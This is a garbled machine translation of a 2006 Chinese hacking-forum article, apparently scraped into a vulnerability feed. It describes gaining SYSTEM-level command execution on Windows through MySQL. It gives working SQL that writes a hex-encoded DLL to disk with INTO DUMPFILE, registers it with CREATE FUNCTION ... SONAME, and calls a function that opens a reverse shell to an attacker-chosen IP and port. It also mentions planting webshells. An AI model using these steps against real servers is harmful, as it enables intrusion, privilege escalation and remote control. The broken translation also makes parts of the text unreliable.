The Windows environment via the MySQL to the SYSTEM status perform system commands-bug warning-the black bar safety net

2006-04-23T00:00:00
ID MYHACK58:6220068824
Type myhack58
Reporter 佚名
Modified 2006-04-23T00:00:00

Description

Some time ago two about MySQL vulnerabilities in the MySQL CREATE FUNCTION mysql. func table allows injecting arbitrary function library vulnerability, the MySQL CREATE FUNCTION libc library allows arbitrary code execution vulnerabilities of a careful study of these two vulnerabilities, you can learn MySQL the two functions:

2 First: you can through the MySQL upload binary files such as write yourself a UDF DLL

2 The second: you can register UDF DLL in the self-written Function and execute arbitrary commands.

Note, here the two functions are MySQL own function, rather than vulnerability, this article writing purpose is not to study the above two vulnerabilities, but in order to resolve the MySQL's own functions to achieve in the Windows environment using MySQL to SYSTEM status to perform the system command.

Unofficial By MySQL to upload the binary file in a vulnerability announcement previously, according to the author's understanding of the domestic is not too many people know PS: hope not too many tomatoes and eggs, Oh, from the year in the grey trajectories of the forum rise to the MySQL weak password attacks to a vulnerability announcement appeared previously, are just used MySQL to upload the text file to do the WebShell or start a group of BAT, VBS, etc.

By registering a UDF DLL in the self-written Function to execute arbitrary commands, this technology is very early for someone to know, but not fully disclosed, as the back door of a method only in private propagation of PS: the same hope that not too many tomatoes and eggs, Oh you.

The author in the last year 2 0 0 4 year 0 9 month to write that MySQL injection tool phprf the time spent most of the day the effort has been put by uploading the binary file of the method found, and the vulnerability announcement referred to in the method is somewhat the same feeling, and by self-writing the UDF DLL to execute arbitrary command this thing but it is only recently know. Vulnerability announcement came out, spent 2, 3 hours to find the Find the UDF DLL data write yourself a DLL, and then test a bit, nothing technical difficulties. In addition, due to the MySQL on the Windows platform the following are System Services in the form of start, but very few people modify their start account, combined with MySQL which of the two functions it is possible to use MySQL to SYSTEM status perform system commands.

Upload binary file The following two tables to illustrate the vulnerability to the announcement of the upload method and the author's own research of the upload method.

$solib="0x7f454c46010101000000000000.............. Definition of binary data of hexadecimal representation

CREATE TABLE blob_tab (blob_col BLOB);

Set up a data table to store binary data

INSERT into blob_tab values (CONVERT($solib,CHAR));

The binary data is stored into the table

SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso. so. 0';

Export binary data to a file

Table 1 vulnerability Bulletin of the upload method

Table 1 vulnerability Bulletin of the upload method

set @a = concat(",0x4d5a900003000000);

"set @a = concat(@a,0x04000000ffff0000b80000000);

......

Definition of binary data of hexadecimal representation

create table Mix(data LONGBLOB);

Set up a data table to store binary data

insert into Mix values("");update Mix set data = @a;

The binary data is stored into the table

select data from Mix into DUMPFILE 'C:\\Winnt\\Mix.dll';

Export binary data to a file

Two tables in binary data is the writing of the UDF DLL to the binary data.

Vulnerability Bulletin of upload method is required in the PHP program implemented by hand using the MySQL client login is not possible, and the author of the upload method may be through the MySQL client login manually to achieve, who preferably who deterioration it is not discussed, the two methods integrated a bit better.

Register Function to execute commands Want to write your own UDF DLL comrades, the easiest way is to download the MySQL source code, there is a udf_example below the author only do some simple introduction:

extern "C" {...}//define a Function function, a norm Function has at least three functions

Mix()//the required main function for processing the Function of the transaction flow, reverse link code written on the inside

Mix_init()//optional initialization function that is generally used to check the user input parameters

Mix_deinit()//optional, when the Function exit do post-processing

Further detailed information can refer to: http://netlab.cse.yzu.edu.tw/~statue/cfc/docs/mysqldoc_big5/manual_Adding_functions. html a bit of programming skills should understand udf_example the source code, compiling the before don't forget to modify udf_example. def Oh, huh!

In the Annex with a The author of the DLL, after the operation can the reverse link back to a Shell. In the MySQL client needs to the execution of the command is:

CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\Winnt\\Mix.dll';/*note: modify the file address

select Mixconnect('127.0.0.1','8 8 6');/*Note To modify the reverse link back the IP address and port number

Annex The DLL in the anti-link the Shell portion of the use of the disclosed source code is adapted, so if is antivirus Avira please do not doubt. The DLL is only for testing, to test the consequences of the author and the Phantom brigade is not responsible!